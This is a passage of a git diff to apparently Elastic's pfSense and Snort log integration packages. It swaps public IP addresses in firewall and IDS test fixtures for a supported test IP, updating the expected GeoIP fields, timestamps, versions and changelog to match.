146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18714,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:42.068547600Z", + "original": "\u003c134\u003e1 2021-07-03T19:10:15.590217-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18714,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", "kind": "event", @@ -882,7 +891,7 @@ }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594610921Z", + "ingested": "2021-12-09T13:44:42.068553Z", "original": "\u003c134\u003e1 2021-07-03T19:10:15.590279-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,64,3666,0,DF,17,udp,69,10.170.27.9,10.170.27.1,26641,53,49", "provider": "filterlog", "timezone": "-05:00", @@ -964,7 +973,7 @@ }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594613537Z", + "ingested": "2021-12-09T13:44:42.068558600Z", "original": "\u003c134\u003e1 2021-07-03T19:10:15.590303-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,64,51896,0,DF,17,udp,69,10.170.27.9,192.168.1.1,26641,53,49", "provider": "filterlog", "timezone": "-05:00", @@ -988,26 +997,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "region_iso_code": "AU-SA", - "city_name": "Adelaide", - "country_iso_code": "AU", - "country_name": "Australia", - "region_name": "South Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 138.6005, - "lat": -34.9274 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.0.0.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.0.0.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -1017,12 +1025,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,543,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,543,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:KOUO4DlIIBIJZptxMOvx/CV/TL4=", + "community_id": "1:hU8z0kIzXfY6WDCCq4pzWYAEs8U=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -1067,14 +1075,14 @@ }, "related": { "ip": [ - "1.0.0.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594616132Z", - "original": "\u003c134\u003e1 2021-07-03T19:10:15.590325-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,543,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:42.068563900Z", + "original": "\u003c134\u003e1 2021-07-03T19:10:15.590325-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,543,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", "kind": "event", @@ -1097,23 +1105,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -1123,12 +1133,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,46364,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49656,853,0,S,1642052952,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,46364,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49656,853,0,S,1642052952,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:VEzuYPgHkR86schJXPUtYuTaLWg=", + "community_id": "1:KQjMGn82EpgQSlEFUH0STxOwZnw=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -1173,14 +1183,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594618970Z", - "original": "\u003c134\u003e1 2021-07-03T19:10:15.590347-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,46364,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49656,853,0,S,1642052952,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:42.068569700Z", + "original": "\u003c134\u003e1 2021-07-03T19:10:15.590347-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,46364,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49656,853,0,S,1642052952,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", "kind": "event", @@ -1202,9 +1212,26 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, + "address": "175.16.199.1", "port": 1900, - "address": "239.255.255.250", - "ip": "239.255.255.250" + "ip": "175.16.199.1" }, "rule": { "id": "1520797915" @@ -1214,12 +1241,12 @@ "address": "10.170.40.57", "ip": "10.170.40.57" }, - "message": "183,,,1520797915,igb1.40,match,pass,in,4,0x0,,1,56778,0,DF,17,udp,200,10.170.40.57,239.255.255.250,58037,1900,180", + "message": "183,,,1520797915,igb1.40,match,pass,in,4,0x0,,1,56778,0,DF,17,udp,200,10.170.40.57,175.16.199.1,58037,1900,180", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:zQlSZYr6L6UmGnGMlB6SCDIrqS8=", + "community_id": "1:kgv3BScgF1Epa1mP4afTUtGbZH8=", "transport": "udp", "type": "ipv4", "bytes": 200, @@ -1255,14 +1282,14 @@ }, "related": { "ip": [ - "239.255.255.250", + "175.16.199.1", "10.170.40.57" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594621556Z", - "original": "\u003c134\u003e1 2021-07-03T19:10:15.590370-05:00 pfSense.example.com filterlog 72237 - - 183,,,1520797915,igb1.40,match,pass,in,4,0x0,,1,56778,0,DF,17,udp,200,10.170.40.57,239.255.255.250,58037,1900,180", + "ingested": "2021-12-09T13:44:42.068575200Z", + "original": "\u003c134\u003e1 2021-07-03T19:10:15.590370-05:00 pfSense.example.com filterlog 72237 - - 183,,,1520797915,igb1.40,match,pass,in,4,0x0,,1,56778,0,DF,17,udp,200,10.170.40.57,175.16.199.1,58037,1900,180", "provider": "filterlog", "timezone": "-05:00", "kind": "event", @@ -1339,7 +1366,7 @@ }, "event": { "reason": "ip-option", - "ingested": "2021-09-14T22:09:25.594624165Z", + "ingested": "2021-12-09T13:44:42.068580500Z", "original": "\u003c134\u003e1 2021-09-14T15:31:58.860079-05:00 pfSense.example.com filterlog 72913 - - 176,,,1520797901,igb1.50,ip-option,pass,in,4,0xc0,,1,20651,0,none,2,igmp,32,10.100.10.23,224.0.0.1,datalength=8 ", "provider": "filterlog", "timezone": "-05:00", diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-unbound.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-unbound.log-expected.json index eeaa7ee4a72..55ea1dd7255 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-unbound.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-unbound.log-expected.json @@ -43,7 +43,7 @@ "ip": "192.168.1.1" }, "event": { - "ingested": "2021-09-14T22:09:34.511913684Z", + "ingested": "2021-12-09T13:44:44.375894100Z", "original": "\u003c30\u003eAug 15 16:19:02 unbound[26931]: [26931:0] info: 192.168.1.1 api.opensubtitles.org. A IN", "provider": "unbound", "timezone": "-04:00", @@ -100,7 +100,7 @@ "ip": "172.16.33.2" }, "event": { - "ingested": "2021-09-14T22:09:34.511923033Z", + "ingested": "2021-12-09T13:44:44.375902400Z", "original": "\u003c30\u003eAug 15 16:18:59 unbound[26931]: [26931:2] info: 172.16.33.2 clients4.google.com. A IN", "provider": "unbound", "timezone": "-04:00", diff --git a/packages/pfsense/manifest.yml b/packages/pfsense/manifest.yml index d132c123b36..39950ac00bf 100644 --- a/packages/pfsense/manifest.yml +++ b/packages/pfsense/manifest.yml @@ -1,6 +1,6 @@ name: pfsense title: pfSense Logs -version: 0.2.0 +version: 0.2.1 release: experimental description: Collect and parse logs from pfSense devices with Elastic Agent. type: integration diff --git a/packages/snort/_dev/deploy/docker/sample_logs/test-full.log b/packages/snort/_dev/deploy/docker/sample_logs/test-full.log index 3a49245168f..bb3f0af3b12 100644 --- a/packages/snort/_dev/deploy/docker/sample_logs/test-full.log +++ b/packages/snort/_dev/deploy/docker/sample_logs/test-full.log @@ -12,6 +12,6 @@ Len: 55 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] -09/04-21:53:15.299988 10.100.10.190 -> 172.217.1.142 +09/04-21:53:15.299988 10.100.10.190 -> 175.16.199.1 ICMP TTL:64 TOS:0x0 ID:6922 IpLen:20 DgmLen:84 DF Type:8 Code:0 ID:101 Seq:1 ECHO \ No newline at end of file diff --git a/packages/snort/_dev/deploy/docker/sample_logs/test-log.log b/packages/snort/_dev/deploy/docker/sample_logs/test-log.log index 0243f2538c9..3c295b5e687 100644 --- a/packages/snort/_dev/deploy/docker/sample_logs/test-log.log +++ b/packages/snort/_dev/deploy/docker/sample_logs/test-log.log @@ -1,12 +1,12 @@ -09/03/21-12:37:16.428952 ,1,2403488,68499,"ET CINS Active Threat Intelligence Poor Reputation IP TCP group 95",TCP,89.248.168.157,36847,104.5.30.130,91,54321,Misc Attack,2,alert,Allow -09/03/21-12:56:44.310212 ,1,2011716,4,"ET SCAN Sipvicious User-Agent Detected (friendly-scanner)",UDP,193.46.255.221,5103,104.5.30.130,5060,54925,Attempted Information Leak,2,alert,Allow +09/03/21-12:37:16.428952 ,1,2403488,68499,"ET CINS Active Threat Intelligence Poor Reputation IP TCP group 95",TCP,175.16.199.1,36847,175.16.199.1,91,54321,Misc Attack,2,alert,Allow +09/03/21-12:56:44.310212 ,1,2011716,4,"ET SCAN Sipvicious User-Agent Detected (friendly-scanner)",UDP,175.16.199.1,5103,175.16.199.1,5060,54925,Attempted Information Leak,2,alert,Allow 05/30-19:09:10.917356 [**] [1:527:8] BAD-TRAFFIC same SRC/DST [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 0.0.0.0:68 -> 255.255.255.255:67 -05/30-19:09:28.472094 [**] [1:2012811:2] ET DNS DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 192.168.88.10:1029 -> 4.2.2.3:53 -05/30-19:09:10.917356 [**] [1:477:3] ICMP Packet [**] [Priority: 0] {ICMP} 172.25.212.245 -> 172.25.212.153 -12/30-14:09:21.116402 [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification: Detection of a Network Scan] [Priority: 3] {TCP} 192.168.15.10:1035 -> 239.255.255.250:1900 -01/21-02:23:42.327730 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 31.7.62.154:80 -> 192.168.115.10:1051 -01/21-02:23:42.208605 [**] [1:408:5] ICMP Echo Reply [**] [Classification: Misc activity] [Priority: 3] {ICMP} 31.7.62.154 -> 192.168.115.10 -09/03/21-16:29:03.494387 ,1,477,3,"ICMP Packet",ICMP,104.5.30.130,,104.5.30.1,,40546,,0,alert,Allow +05/30-19:09:28.472094 [**] [1:2012811:2] ET DNS DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 192.168.88.10:1029 -> 175.16.199.1:53 +05/30-19:09:10.917356 [**] [1:477:3] ICMP Packet [**] [Priority: 0] {ICMP} 175.16.199.1 -> 175.16.199.1 +12/30-14:09:21.116402 [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification: Detection of a Network Scan] [Priority: 3] {TCP} 192.168.15.10:1035 -> 175.16.199.1:1900 +01/21-02:23:42.327730 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 175.16.199.1:80 -> 192.168.115.10:1051 +01/21-02:23:42.208605 [**] [1:408:5] ICMP Echo Reply [**] [Classification: Misc activity] [Priority: 3] {ICMP} 175.16.199.1 -> 192.168.115.10 +09/03/21-16:29:03.494387 ,1,477,3,"ICMP Packet",ICMP,175.16.199.1,,175.16.199.1,,40546,,0,alert,Allow 09/04-21:45:37.536335 ,1,1000006,0,"TCP connection",TCP,10.100.20.59,57263,10.100.10.190,22,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x72,***AP***,0x688F0DFC,0xBC763516,,0x80C,127,0,55665,100,102400,,,, 09/04-21:50:40.017935 ,1,1000005,0,"UDP Connection",UDP,10.100.10.1,53,10.100.10.190,55475,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0xC1,,,,,,64,0,56094,179,183296,,,, -09/04-21:49:55.900215 ,1,1000004,0,"Pinging...",ICMP,10.100.10.190,,1.1.1.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37607,84,86016,8,0,83,1 \ No newline at end of file +09/04-21:49:55.900215 ,1,1000004,0,"Pinging...",ICMP,10.100.10.190,,175.16.199.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37607,84,86016,8,0,83,1 \ No newline at end of file diff --git a/packages/snort/_dev/deploy/docker/sample_logs/test-syslog.log b/packages/snort/_dev/deploy/docker/sample_logs/test-syslog.log index d5ec77c0258..b242df14f24 100644 --- a/packages/snort/_dev/deploy/docker/sample_logs/test-syslog.log +++ b/packages/snort/_dev/deploy/docker/sample_logs/test-syslog.log @@ -1,3 +1,3 @@ Sep 5 16:05:26 dev snort: [1:1000017:0] UDP Connection [Classification: Misc activity] [Priority: 3] {UDP} 10.150.10.44:55776 -> 10.25.10.22:32414 Sep 5 16:05:26 dev snort: [1:1000016:0] TCP Connection [Priority: 3] {TCP} 10.50.20.59:58720 -> 10.50.10.190:22 -Sep 5 16:02:55 dev snort: [1:1000015:0] Pinging... [Classification: Misc activity] [Priority: 3] {ICMP} 10.50.10.88 -> 142.251.33.14 \ No newline at end of file +Sep 5 16:02:55 dev snort: [1:1000015:0] Pinging... [Classification: Misc activity] [Priority: 3] {ICMP} 10.50.10.88 -> 175.16.199.1 \ No newline at end of file diff --git a/packages/snort/changelog.yml b/packages/snort/changelog.yml index 3fdcaee93c2..5ebf92e3a4a 100644 --- a/packages/snort/changelog.yml +++ b/packages/snort/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.1.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.1.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log index e140afbe347..f597ef6fcea 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log @@ -3,6 +3,6 @@ 09/04-21:50:40.017935 ,1,1000005,0,"UDP Connection",UDP,10.100.10.1,53,10.100.10.190,55475,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0xC1,,,,,,64,0,56094,179,183296,,,, 09/04-21:50:39.947383 ,1,1000005,0,"UDP Connection",UDP,10.100.10.1,53,10.100.10.190,55333,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0xB1,,,,,,64,0,26112,163,166912,,,, 09/04-21:50:40.666095 ,1,1000005,0,"UDP Connection",UDP,10.100.10.75,55776,10.100.10.255,32414,00:0C:29:B8:43:CE,FF:FF:FF:FF:FF:FF,0x3F,,,,,,64,0,37712,49,50176,,,, -09/04-21:49:55.900215 ,1,1000004,0,"Pinging...",ICMP,10.100.10.190,,1.1.1.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37607,84,86016,8,0,83,1 -09/04-21:49:55.911592 ,1,1000004,0,"Pinging...",ICMP,1.1.1.1,,10.100.10.190,,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x62,,,,,,54,0,23522,84,86016,0,0,83,1 -09/04-21:49:56.900997 ,1,1000004,0,"Pinging...",ICMP,10.100.10.190,,1.1.1.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37636,84,86016,8,0,83,2 \ No newline at end of file +09/04-21:49:55.900215 ,1,1000004,0,"Pinging...",ICMP,10.100.10.190,,175.16.199.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37607,84,86016,8,0,83,1 +09/04-21:49:55.911592 ,1,1000004,0,"Pinging...",ICMP,175.16.199.1,,10.100.10.190,,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x62,,,,,,54,0,23522,84,86016,0,0,83,1 +09/04-21:49:56.900997 ,1,1000004,0,"Pinging...",ICMP,10.100.10.190,,175.16.199.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37636,84,86016,8,0,83,2 \ No newline at end of file diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log-expected.json index 67199d3d11f..14b4a192b88 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log-expected.json +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log-expected.json @@ -43,7 +43,7 @@ ] }, "event": { - "ingested": "2021-09-20T12:26:41.873009104Z", + "ingested": "2021-12-09T13:44:48.094036100Z", "original": "09/04-21:45:37.536335 ,1,1000006,0,\"TCP connection\",TCP,10.100.20.59,57263,10.100.10.190,22,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x72,***AP***,0x688F0DFC,0xBC763516,,0x80C,127,0,55665,100,102400,,,,", "category": [ "network" @@ -117,7 +117,7 @@ ] }, "event": { - "ingested": "2021-09-20T12:26:41.873086695Z", + "ingested": "2021-12-09T13:44:48.094040500Z", "original": "09/04-21:45:37.553882 ,1,1000006,0,\"TCP connection\",TCP,10.100.20.59,57263,10.100.10.190,22,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x72,***AP***,0x688F0E38,0xBC763552,,0x80C,127,0,55666,100,102400,,,,", "category": [ "network" @@ -191,7 +191,7 @@ ] }, "event": { - "ingested": "2021-09-20T12:26:41.873096482Z", + "ingested": "2021-12-09T13:44:48.094047600Z", "original": "09/04-21:50:40.017935 ,1,1000005,0,\"UDP Connection\",UDP,10.100.10.1,53,10.100.10.190,55475,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0xC1,,,,,,64,0,56094,179,183296,,,,", "category": [ "network" @@ -262,7 +262,7 @@ ] }, "event": { - "ingested": "2021-09-20T12:26:41.873100094Z", + "ingested": "2021-12-09T13:44:48.094054900Z", "original": "09/04-21:50:39.947383 ,1,1000005,0,\"UDP Connection\",UDP,10.100.10.1,53,10.100.10.190,55333,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0xB1,,,,,,64,0,26112,163,166912,,,,", "category": [ "network" @@ -333,7 +333,7 @@ ] }, "event": { - "ingested": "2021-09-20T12:26:41.873103445Z", + "ingested": "2021-12-09T13:44:48.094060Z", "original": "09/04-21:50:40.666095 ,1,1000005,0,\"UDP Connection\",UDP,10.100.10.75,55776,10.100.10.255,32414,00:0C:29:B8:43:CE,FF:FF:FF:FF:FF:FF,0x3F,,,,,,64,0,37712,49,50176,,,,", "category": [ "network" @@ -364,23 +364,25 @@ { "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "mac": "00:25:90:3A:05:13", - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "description": "Pinging...", @@ -396,7 +398,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2tRzWxcmOEdEZgq/cv3/yeRD60Q=", + "community_id": "1:jEaJsIOzda45Q8FjN0LeZEATihA=", "transport": "icmp", "type": "ipv4", "direction": "outbound" @@ -413,12 +415,12 @@ "related": { "ip": [ "10.100.10.190", - "1.1.1.1" + "175.16.199.1" ] }, "event": { - "ingested": "2021-09-20T12:26:41.873106570Z", - "original": "09/04-21:49:55.900215 ,1,1000004,0,\"Pinging...\",ICMP,10.100.10.190,,1.1.1.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37607,84,86016,8,0,83,1", + "ingested": "2021-12-09T13:44:48.094065100Z", + "original": "09/04-21:49:55.900215 ,1,1000004,0,\"Pinging...\",ICMP,10.100.10.190,,175.16.199.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37607,84,86016,8,0,83,1", "category": [ "network" ], @@ -464,29 +466,31 @@ }, "source": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "mac": "00:25:90:3A:05:13", - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:53l0pZVye5X9Nqti5cQB3Iiuohk=", + "community_id": "1:PsO7nB0G1KDZ1IDLocfXBmcxiaA=", "transport": "icmp", "type": "ipv4", "direction": "inbound" @@ -502,13 +506,13 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.100.10.190" ] }, "event": { - "ingested": "2021-09-20T12:26:41.873109761Z", - "original": "09/04-21:49:55.911592 ,1,1000004,0,\"Pinging...\",ICMP,1.1.1.1,,10.100.10.190,,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x62,,,,,,54,0,23522,84,86016,0,0,83,1", + "ingested": "2021-12-09T13:44:48.094070200Z", + "original": "09/04-21:49:55.911592 ,1,1000004,0,\"Pinging...\",ICMP,175.16.199.1,,10.100.10.190,,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x62,,,,,,54,0,23522,84,86016,0,0,83,1", "category": [ "network" ], @@ -544,23 +548,25 @@ { "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "mac": "00:25:90:3A:05:13", - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "description": "Pinging...", @@ -576,7 +582,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2tRzWxcmOEdEZgq/cv3/yeRD60Q=", + "community_id": "1:jEaJsIOzda45Q8FjN0LeZEATihA=", "transport": "icmp", "type": "ipv4", "direction": "outbound" @@ -593,12 +599,12 @@ "related": { "ip": [ "10.100.10.190", - "1.1.1.1" + "175.16.199.1" ] }, "event": { - "ingested": "2021-09-20T12:26:41.873112942Z", - "original": "09/04-21:49:56.900997 ,1,1000004,0,\"Pinging...\",ICMP,10.100.10.190,,1.1.1.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37636,84,86016,8,0,83,2", + "ingested": "2021-12-09T13:44:48.094076700Z", + "original": "09/04-21:49:56.900997 ,1,1000004,0,\"Pinging...\",ICMP,10.100.10.190,,175.16.199.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37636,84,86016,8,0,83,2", "category": [ "network" ], diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log index e5dff6be505..23a7b6e9b8c 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log @@ -1,10 +1,10 @@ 05/30-19:09:10.917356 [**] [1:527:8] BAD-TRAFFIC same SRC/DST [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 0.0.0.0:68 -> 255.255.255.255:67 -05/30-19:09:28.472094 [**] [1:2012811:2] ET DNS DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 192.168.88.10:1029 -> 4.2.2.3:53 -05/30-19:09:10.917356 [**] [1:477:3] ICMP Packet [**] [Priority: 0] {ICMP} 172.25.212.245 -> 172.25.212.153 -12/30-14:09:21.116402 [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification: Detection of a Network Scan] [Priority: 3] {TCP} 192.168.15.10:1035 -> 239.255.255.250:1900 -01/21-02:23:42.327730 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 31.7.62.154:80 -> 192.168.115.10:1051 -01/21-02:23:42.208605 [**] [1:408:5] ICMP Echo Reply [**] [Classification: Misc activity] [Priority: 3] {ICMP} 31.7.62.154 -> 192.168.115.10 -09/04-21:55:02.041364 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 1.0.0.1:53 -> 10.100.10.190:54757 -09/04-21:55:02.118427 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 1.0.0.1:53 -> 10.100.10.190:36312 -09/04-21:54:43.216486 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 10.100.10.190 -> 1.1.1.1 -09/04-21:54:43.227117 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 1.1.1.1 -> 10.100.10.190 \ No newline at end of file +05/30-19:09:28.472094 [**] [1:2012811:2] ET DNS DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 192.168.88.10:1029 -> 175.16.199.1:53 +05/30-19:09:10.917356 [**] [1:477:3] ICMP Packet [**] [Priority: 0] {ICMP} 175.16.199.1 -> 175.16.199.1 +12/30-14:09:21.116402 [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification: Detection of a Network Scan] [Priority: 3] {TCP} 192.168.15.10:1035 -> 175.16.199.1:1900 +01/21-02:23:42.327730 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 175.16.199.1:80 -> 192.168.115.10:1051 +01/21-02:23:42.208605 [**] [1:408:5] ICMP Echo Reply [**] [Classification: Misc activity] [Priority: 3] {ICMP} 175.16.199.1 -> 192.168.115.10 +09/04-21:55:02.041364 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 175.16.199.1:53 -> 10.100.10.190:54757 +09/04-21:55:02.118427 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 175.16.199.1:53 -> 10.100.10.190:36312 +09/04-21:54:43.216486 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 10.100.10.190 -> 175.16.199.1 +09/04-21:54:43.227117 [**] 